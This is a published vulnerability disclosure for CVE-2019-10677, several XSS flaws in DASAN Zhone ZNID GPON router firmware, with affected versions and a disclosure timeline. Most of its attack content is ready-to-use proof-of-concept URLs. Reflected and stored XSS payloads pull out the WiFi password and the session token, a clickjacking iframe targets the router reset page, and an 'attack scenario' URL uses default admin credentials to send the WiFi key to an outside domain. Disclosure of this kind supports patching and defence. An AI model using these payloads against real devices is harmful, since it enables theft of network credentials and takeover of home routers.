CVE-2019-10677Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters.
This vulnerability affects all zNID(s) models running following firmware versions: all releases of 3.0.xxx SW (on 3.0 branch), release 3.1.349 and earlier (on 3.1 branch), release 3.2.087 and earlier (on 3.2 branch), release 4.1.253 and earlier (on 4.1 branch), release 5.0.019 and earlier (on 5.0 branch).

Proof of Concept:

# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
# Date: 31.03.2019
# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
# Vendor Homepage: https://dasanzhone.com
# Version: <= S3.1.285
# Alternate Version: <= S3.0.738
# Tested on: version S3.1.285 (alternate version S3.0.738)
# CVE : CVE-2019-10677

= Reflected Cross-Site Scripting (XSS) =
http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp

= Stored Cross-Site Scripting (XSS) =
* WiFi network plaintext password
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
* CSRF token
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//

= Clickjacking =
<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>

= Attack scenario =
http://admin:admin@192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=';document.location=/*&wlWscCfgMethod=*/'//redteam.pl/'%2BwpaPskKey;//

Timeline:
2019-03-31 — requested CVE-2019-10677
2019-04-01 — reported to vendor
2019-09-03 — security patch


Adam Ziaja <adam@adamziaja.com>